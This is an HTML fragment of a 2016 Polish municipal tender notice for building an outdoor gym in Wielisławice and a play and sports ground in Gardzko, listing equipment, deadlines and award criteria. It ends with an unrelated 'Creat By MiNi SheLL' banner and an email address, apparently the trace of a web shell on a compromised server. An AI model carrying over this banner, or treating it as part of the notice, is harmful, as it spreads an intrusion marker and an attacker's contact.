Dopuszcza się zastosowanie robót zamiennych z przyczyn o charakterze technologicznym, jeżeli wprowadzenie robót zamiennych jest konieczne do prawidłowego wykonania umowy oraz nie powoduje rozszerzenia przedmiotu zamówienia w stosunku do przedmiotu określonego w specyfikacji istotnych warunków zamówienia oraz wynikającego z treści oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzelce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Al. Wolności 48, 66-500 Strzelce Krajeńskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2016 godzina 13:00, miejsce: Urząd Miejski, Al. Wolności 48, 66-500 Strzelce Krajeńskie Punkt Informacyjny - biuro nr 3 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa profesjonalnej siłowni na świeżym powietrzu 
w Wielisławiach gmina Strzelce Krajeńskie - zadanie I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa profesjonalnej siłowni na świeżym powietrzu w Wielisławicach

1.Roboty przygotowawcze
2.Nawierzchnie utwardzone
3.Zieleń 
4.Ogrodzenie terenu
5.Zagospodarowanie terenu
6.Urządzenia - 10 szt., w tym:
1)Wyciąg górny
2)Twister
3)Surfer
4)Rider
5)Orbitek pojedynczy
6)Prasa nożna
7)Maszyna do wyciskania
8)Biegacz
9)Wioślarz
10)Step per
7.Tablica informacyjno-promocyjna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.20-4, 45.11.27.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa placu zabawowo - sportowego w Gardzku gmina Strzelce Krajeńskie - zadanie II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa placu zabawowo-sportowego w Gardzku

1.Roboty przygotowawcze
2.Nawierzchnie utwardzone
3.Nawierzchnia żwirowa
4.Zieleń 
5.Ogrodzenie terenu
6.Zagospodarowanie terenu
7.Urządzenia - 14 szt., w tym:
1)Wyciąg górny
2)Rider
3)Orbitek pojedynczy
4)Maszyna do wyciskania
5)Narciarz
6)Rower
7)Drążek
8)Piaskownica
9)Zjeżdżalnia
10)karuzela
11)Huśtawka
12)Bujak
13)Pomost wiszący
14)Przepłotnica łańcuchowa ze słupkiem
8.Wyposażenie boiska
1)Linie boiska
2)Bramki do piłki nożnej
3)piłkochwyty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.20-4, 45.11.27.23-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.07.2016.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com